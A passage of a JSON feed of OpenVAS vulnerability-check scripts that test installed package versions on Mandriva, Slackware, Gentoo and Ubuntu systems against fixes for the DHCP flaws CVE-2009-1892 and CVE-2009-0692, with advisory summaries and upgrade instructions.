value:\"2009-07-29 19:28:37 +0200 (Wed, 29 Jul 2009)\");\n script_cve_id(\"CVE-2009-1892\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_name(\"Mandrake Security Advisory MDVSA-2009:154 (dhcp)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"dhcp-client\", rpm:\"dhcp-client~3.0.7~0.2mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-common\", rpm:\"dhcp-common~3.0.7~0.2mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-devel\", rpm:\"dhcp-devel~3.0.7~0.2mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-doc\", rpm:\"dhcp-doc~3.0.7~0.2mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-relay\", rpm:\"dhcp-relay~3.0.7~0.2mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-server\", rpm:\"dhcp-server~3.0.7~0.2mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-client\", rpm:\"dhcp-client~3.0.7~1.4mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-common\", rpm:\"dhcp-common~3.0.7~1.4mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-devel\", rpm:\"dhcp-devel~3.0.7~1.4mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-doc\", rpm:\"dhcp-doc~3.0.7~1.4mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-relay\", rpm:\"dhcp-relay~3.0.7~1.4mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-server\", rpm:\"dhcp-server~3.0.7~1.4mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-client\", rpm:\"dhcp-client~4.1.0~5.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-common\", rpm:\"dhcp-common~4.1.0~5.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-devel\", rpm:\"dhcp-devel~4.1.0~5.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-doc\", rpm:\"dhcp-doc~4.1.0~5.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-relay\", rpm:\"dhcp-relay~4.1.0~5.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-server\", rpm:\"dhcp-server~4.1.0~5.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-client\", rpm:\"dhcp-client~3.0.7~0.2.C30mdk\", rls:\"MNDK_3.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-common\", rpm:\"dhcp-common~3.0.7~0.2.C30mdk\", rls:\"MNDK_3.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-devel\", rpm:\"dhcp-devel~3.0.7~0.2.C30mdk\", rls:\"MNDK_3.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-relay\", rpm:\"dhcp-relay~3.0.7~0.2.C30mdk\", rls:\"MNDK_3.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-server\", rpm:\"dhcp-server~3.0.7~0.2.C30mdk\", rls:\"MNDK_3.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-client\", rpm:\"dhcp-client~3.0.7~0.2.20060mlcs4\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-common\", rpm:\"dhcp-common~3.0.7~0.2.20060mlcs4\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-devel\", rpm:\"dhcp-devel~3.0.7~0.2.20060mlcs4\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-relay\", rpm:\"dhcp-relay~3.0.7~0.2.20060mlcs4\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-server\", rpm:\"dhcp-server~3.0.7~0.2.20060mlcs4\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-client\", rpm:\"dhcp-client~3.0.7~0.2.C30mdk\", rls:\"MNDK_2.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-common\", rpm:\"dhcp-common~3.0.7~0.2.C30mdk\", rls:\"MNDK_2.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-devel\", rpm:\"dhcp-devel~3.0.7~0.2.C30mdk\", rls:\"MNDK_2.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-relay\", rpm:\"dhcp-relay~3.0.7~0.2.C30mdk\", rls:\"MNDK_2.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-server\", rpm:\"dhcp-server~3.0.7~0.2.C30mdk\", rls:\"MNDK_2.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-04-06T11:39:34", "description": "The remote host is missing an update to dhcp\nannounced via advisory MDVSA-2009:154.", "cvss3": {}, "published": "2009-07-29T00:00:00", "type": "openvas", "title": "Mandrake Security Advisory MDVSA-2009:154 (dhcp)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1892"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:136141256231064458", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231064458", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: mdksa_2009_154.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory MDVSA-2009:154 (dhcp)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A vulnerability has been found and corrected in ISC DHCP:\n\nISC DHCP Server is vulnerable to a denial of service, caused by the\nimproper handling of DHCP requests. If the host definitions are mixed\nusing dhcp-client-identifier and hardware ethernet, a remote attacker\ncould send specially-crafted DHCP requests to cause the server to\nstop responding (CVE-2009-1892).\n\nThis update provides fixes for this vulnerability.\n\nAffected: 2008.1, 2009.0, 2009.1, Corporate 3.0, Corporate 4.0,\n Multi Network Firewall 2.0\";\ntag_solution = \"To upgrade automatically use MandrakeUpdate or urpmi. The verification\nof md5 checksums and GPG signatures is performed automatically for you.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=MDVSA-2009:154\nhttp://xforce.iss.net/xforce/xfdb/51717\";\ntag_summary = \"The remote host is missing an update to dhcp\nannounced via advisory MDVSA-2009:154.\";\n\n \n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.64458\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-07-29 19:28:37 +0200 (Wed, 29 Jul 2009)\");\n script_cve_id(\"CVE-2009-1892\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_name(\"Mandrake Security Advisory MDVSA-2009:154 (dhcp)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"dhcp-client\", rpm:\"dhcp-client~3.0.7~0.2mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-common\", rpm:\"dhcp-common~3.0.7~0.2mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-devel\", rpm:\"dhcp-devel~3.0.7~0.2mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-doc\", rpm:\"dhcp-doc~3.0.7~0.2mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-relay\", rpm:\"dhcp-relay~3.0.7~0.2mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-server\", rpm:\"dhcp-server~3.0.7~0.2mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-client\", rpm:\"dhcp-client~3.0.7~1.4mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-common\", rpm:\"dhcp-common~3.0.7~1.4mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-devel\", rpm:\"dhcp-devel~3.0.7~1.4mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-doc\", rpm:\"dhcp-doc~3.0.7~1.4mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-relay\", rpm:\"dhcp-relay~3.0.7~1.4mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-server\", rpm:\"dhcp-server~3.0.7~1.4mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-client\", rpm:\"dhcp-client~4.1.0~5.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-common\", rpm:\"dhcp-common~4.1.0~5.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-devel\", rpm:\"dhcp-devel~4.1.0~5.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-doc\", rpm:\"dhcp-doc~4.1.0~5.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-relay\", rpm:\"dhcp-relay~4.1.0~5.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-server\", rpm:\"dhcp-server~4.1.0~5.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-client\", rpm:\"dhcp-client~3.0.7~0.2.C30mdk\", rls:\"MNDK_3.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-common\", rpm:\"dhcp-common~3.0.7~0.2.C30mdk\", rls:\"MNDK_3.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-devel\", rpm:\"dhcp-devel~3.0.7~0.2.C30mdk\", rls:\"MNDK_3.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-relay\", rpm:\"dhcp-relay~3.0.7~0.2.C30mdk\", rls:\"MNDK_3.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-server\", rpm:\"dhcp-server~3.0.7~0.2.C30mdk\", rls:\"MNDK_3.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-client\", rpm:\"dhcp-client~3.0.7~0.2.20060mlcs4\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-common\", rpm:\"dhcp-common~3.0.7~0.2.20060mlcs4\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-devel\", rpm:\"dhcp-devel~3.0.7~0.2.20060mlcs4\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-relay\", rpm:\"dhcp-relay~3.0.7~0.2.20060mlcs4\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-server\", rpm:\"dhcp-server~3.0.7~0.2.20060mlcs4\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-client\", rpm:\"dhcp-client~3.0.7~0.2.C30mdk\", rls:\"MNDK_2.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-common\", rpm:\"dhcp-common~3.0.7~0.2.C30mdk\", rls:\"MNDK_2.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-devel\", rpm:\"dhcp-devel~3.0.7~0.2.C30mdk\", rls:\"MNDK_2.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-relay\", rpm:\"dhcp-relay~3.0.7~0.2.C30mdk\", rls:\"MNDK_2.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-server\", rpm:\"dhcp-server~3.0.7~0.2.C30mdk\", rls:\"MNDK_2.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-07-24T12:50:59", "description": "The remote host is missing an update as announced\nvia advisory SSA:2009-195-01.", "cvss3": {}, "published": "2012-09-11T00:00:00", "type": "openvas", "title": "Slackware Advisory SSA:2009-195-01 dhcp", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-0692"], "modified": "2017-07-07T00:00:00", "id": "OPENVAS:64439", "href": "http://plugins.openvas.org/nasl.php?oid=64439", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: esoft_slk_ssa_2009_195_01.nasl 6598 2017-07-07 09:36:44Z cfischer $\n# Description: Auto-generated from the corresponding slackware advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"New dhcp packages are available for Slackware 8.1, 9.0, 9.1, 10.0, 10.1, 10.2,\n11.0, 12.0, 12.1, 12.2, and -current to fix a security issue with dhclient.\n\nNote that dhclient is not the default DHCP client in Slackware's networking\nscripts, dhcpcd is. However, if you use dhclient on a network where someone\ncould deploy a hostile DHCP server, you should upgrade to the new package.\";\ntag_summary = \"The remote host is missing an update as announced\nvia advisory SSA:2009-195-01.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=SSA:2009-195-01\";\n \nif(description)\n{\n script_id(64439);\n script_tag(name:\"creation_date\", value:\"2012-09-11 01:34:21 +0200 (Tue, 11 Sep 2012)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:36:44 +0200 (Fri, 07 Jul 2017) $\");\n script_cve_id(\"CVE-2009-0692\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_version(\"$Revision: 6598 $\");\n name = \"Slackware Advisory SSA:2009-195-01 dhcp \";\n script_name(name);\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Slackware Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/slackware_linux\", \"ssh/login/slackpack\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-slack.inc\");\nvuln = 0;\nif(isslkpkgvuln(pkg:\"dhcp\", ver:\"3.1.2p1-i386-1_slack8.1\", rls:\"SLK8.1\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"dhcp\", ver:\"3.1.2p1-i386-1_slack9.0\", rls:\"SLK9.0\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"dhcp\", ver:\"3.1.2p1-i486-1_slack9.1\", rls:\"SLK9.1\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"dhcp\", ver:\"3.1.2p1-i486-1_slack10.0\", rls:\"SLK10.0\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"dhcp\", ver:\"3.1.2p1-i486-1_slack10.1\", rls:\"SLK10.1\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"dhcp\", ver:\"3.1.2p1-i486-1_slack10.2\", rls:\"SLK10.2\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"dhcp\", ver:\"3.1.2p1-i486-1_slack11.0\", rls:\"SLK11.0\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"dhcp\", ver:\"3.1.2p1-i486-1_slack12.0\", rls:\"SLK12.0\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"dhcp\", ver:\"3.1.2p1-i486-1_slack12.1\", rls:\"SLK12.1\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"dhcp\", ver:\"3.1.2p1-i486-1_slack12.2\", rls:\"SLK12.2\")) {\n vuln = 1;\n}\n\nif(vuln) {\n security_message(0);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:56:22", "description": "The remote host is missing updates announced in\nadvisory GLSA 200907-12.", "cvss3": {}, "published": "2009-07-29T00:00:00", "type": "openvas", "title": "Gentoo Security Advisory GLSA 200907-12 (dhcp)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-0692"], "modified": "2017-07-07T00:00:00", "id": "OPENVAS:64434", "href": "http://plugins.openvas.org/nasl.php?oid=64434", "sourceData": "#\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A buffer overflow in dhclient as included in the ISC DHCP implementation\nallows for the remote execution of arbitrary code with root\nprivileges.\";\ntag_solution = \"All ISC DHCP users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=net-misc/dhcp-3.1.1-r1'\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200907-12\nhttp://bugs.gentoo.org/show_bug.cgi?id=277729\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200907-12.\";\n\n \n \n\nif(description)\n{\n script_id(64434);\n script_version(\"$Revision: 6595 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:19:55 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-07-29 19:28:37 +0200 (Wed, 29 Jul 2009)\");\n script_cve_id(\"CVE-2009-0692\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Gentoo Security Advisory GLSA 200907-12 (dhcp)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"net-misc/dhcp\", unaffected: make_list(\"ge 3.1.1-r1\"), vulnerable: make_list(\"lt 3.1.1-r1\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-04T11:29:38", "description": "The remote host is missing an update to dhcp3\nannounced via advisory USN-803-1.", "cvss3": {}, "published": "2009-07-29T00:00:00", "type": "openvas", "title": "Ubuntu USN-803-1 (dhcp3)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-0692"], "modified": "2017-12-01T00:00:00", "id": "OPENVAS:64444", "href": "http://plugins.openvas.org/nasl.php?oid=64444", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: ubuntu_803_1.nasl 7969 2017-12-01 09:23:16Z santu $\n# $Id: ubuntu_803_1.nasl 7969 2017-12-01 09:23:16Z santu $\n# Description: Auto-generated from advisory USN-803-1 (dhcp3)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_solution = \"The problem can be corrected by upgrading your system to the\n following package versions:\n\nUbuntu 6.06 LTS:\n dhcp3-client 3.0.3-6ubuntu7.1\n dhcp3-client-udeb 3.0.3-6ubuntu7.1\n\nUbuntu 8.04 LTS:\n dhcp3-client 3.0.6.dfsg-1ubuntu9.1\n dhcp3-client-udeb 3.0.6.dfsg-1ubuntu9.1\n\nUbuntu 8.10:\n dhcp3-client 3.1.1-1ubuntu2.1\n dhcp3-client-udeb 3.1.1-1ubuntu2.1\n\nUbuntu 9.04:\n dhcp3-client 3.1.1-5ubuntu8.1\n dhcp3-client-udeb 3.1.1-5ubuntu8.1\n\nAfter a standard system upgrade you need to restart any DHCP network\nconnections utilizing dhclient3 to effect the necessary changes.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=USN-803-1\";\n\ntag_insight = \"It was discovered that the DHCP client as included in dhcp3 did not verify\nthe length of certain option fields when processing a response from an IPv4\ndhcp server. If a user running Ubuntu 6.06 LTS or 8.04 LTS connected to a\nmalicious dhcp server, a remote attacker could cause a denial of service or\nexecute arbitrary code as the user invoking the program, typically the\n'dhcp' user. For users running Ubuntu 8.10 or 9.04, a remote attacker\nshould only be able to cause a denial of service in the DHCP client. In\nUbuntu 9.04, attackers would also be isolated by the AppArmor dhclient3\nprofile.\";\ntag_summary = \"The remote host is missing an update to dhcp3\nannounced via advisory USN-803-1.\";\n\n \n\n\nif(description)\n{\n script_id(64444);\n script_version(\"$Revision: 7969 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-01 10:23:16 +0100 (Fri, 01 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-07-29 19:28:37 +0200 (Wed, 29 Jul 2009)\");\n script_cve_id(\"CVE-2009-0692\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Ubuntu USN-803-1 (dhcp3)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-803-1/\");\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Ubuntu Local Security Checks\");\n 